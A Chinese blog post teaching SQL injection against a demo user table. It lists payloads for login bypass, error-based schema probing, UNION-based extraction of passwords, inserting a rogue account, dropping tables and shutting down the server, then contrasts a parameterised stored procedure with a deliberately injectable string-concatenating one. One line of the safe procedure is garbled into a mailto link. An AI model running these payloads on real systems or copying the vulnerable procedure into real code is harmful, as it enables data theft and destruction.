• SQL注入攻击<收藏>


    -SQL注入攻击
    --以任何用户登入(预防:采用参数形式)
    select * from  dbo.userinfo where userName='' and userPwd=''or 1=1--'
    select * from  dbo.userinfo where userName=''or 1=1--'
    --查看除VINET外所有信息
    select * from  dbo.userinfo where userID='VINET' OR 1=1
    --利用已知会员名登入
    select * from  dbo.userinfo where userName='admin '--'
    --利用错误一步步获取信息(预防:自定义错误提示页面)
    select * from  dbo.userinfo where userName=''HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName HAVING 1=1--'
    select * from  dbo.userinfo where userName=''GROUP BY UserID,UserName,UserPwd HAVING 1=1--'
    --根据上面错误信息所得数据向表插入数据(成功!)
    select * from  dbo.userinfo where userName='';INSERT INTO userinfo Values('hacker','hacker')--'
    --破坏性删除表
    select * from  dbo.userinfo where userName='';drop table dbo.Hello--'
    --逐步获取用户账户信息
    select * from  dbo.userinfo where userName=''UNION SELECT 'abc',1,1 FROM userinfo --' --检查类型
    select * from  dbo.userinfo where userName=''UNION SELECT 1,1,1 FROM userinfo --' 获取标题字段
    select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,1 FROM userinfo WHERE UserName>'a'--' --取得所有账户名
    select * from  dbo.userinfo where userName=''UNION SELECT userID,userName,userPwd FROM userinfo where UserName>'a'--' --获取账户密码信息

    --停止服务(权限足够) (;DROP Database D_Name --、 ;DROP TABLE T_Name --)
    select * from  dbo.userinfo where userName='' ;SHUTDOWN--'
    --


    exec dbo.SafeQueryCustomers 'l','l'
    exec dbo.SafeQueryCustomers2 'l','' or 1=1 --'

    CREATE PROCEDURE dbo.SafeQueryCustomers
     (
     @userName nvarchar(30),
     @userPwd nvarchar(12)
     )
    AS
        DECLARE @STR nvarchar(255)
        DECLARE @WK nvarchar(255)
        SET @STR = 'SELECT * FROM dbo.userinfo'
        SET @WK = ''
       
        IF NOT @userName IS NULL 
        BEGIN
           SET @WK = @WK + ' userName LIKE @puserName AND  '
           SET @userName = '%' +@userName + '%'
        END  
       
        IF NOT @userPwd IS NULL    
        BEGIN
           SET @WK = @WK + ' userPwd LIKE @puserPwd AND  '
           SET @userPwd = '%' +@userPwd + '%'
        END  
        IF LEN(@STR) > 0
        BEGIN
           SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
           exec sp_executesql @STR,
    mailto:N%27@puserName nvarchar(30),@puserPwd nvarchar(12)',
    @puserName=@userName,@puserPwd=@userPwd
        End  
        ELSE
           exec sp_executesql @STR
    =============================================

    CREATE PROCEDURE dbo.SafeQueryCustomers2
     (
     @userName nvarchar(30),
     @userPwd nvarchar(12)
     )
    AS
        DECLARE @STR nvarchar(255)
        DECLARE @WK nvarchar(255)
        SET @STR = 'SELECT * FROM dbo.userinfo'
        SET @WK = ''
       
        IF NOT @userName IS NULL 
        BEGIN
           SET @WK = @WK + ' userName LIKE ''%' +@userName + '%'' AND  ' 
        END  
       
        IF NOT @userPwd IS NULL    
        BEGIN
           SET @WK = @WK + ' userPwd LIKE ''%' +@userPwd + '%'' AND  '
          
        END  
         IF LEN(@STR) > 0
        BEGIN
           SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
           exec sp_executesql @STR
        End  
        ELSE
           exec sp_executesql @STR


  • 相关阅读:
    通信专业术语解释
    STM32F10系列管脚设置
    [笔试题]使用回调函数编写冒泡排序,可以排序整形数组,也可以排序字符串
    Date常用转换、比较
    哈希映射
    APP技巧格式
    $.get/$.post/$.ajax/$.getJSON
    使用Rss框架PHP开发流程
    测试rss与navicat连接
    验证码技术
  • 原文地址:https://www.cnblogs.com/Golf9527/p/1558711.html
Copyright © 2020-2023  润新知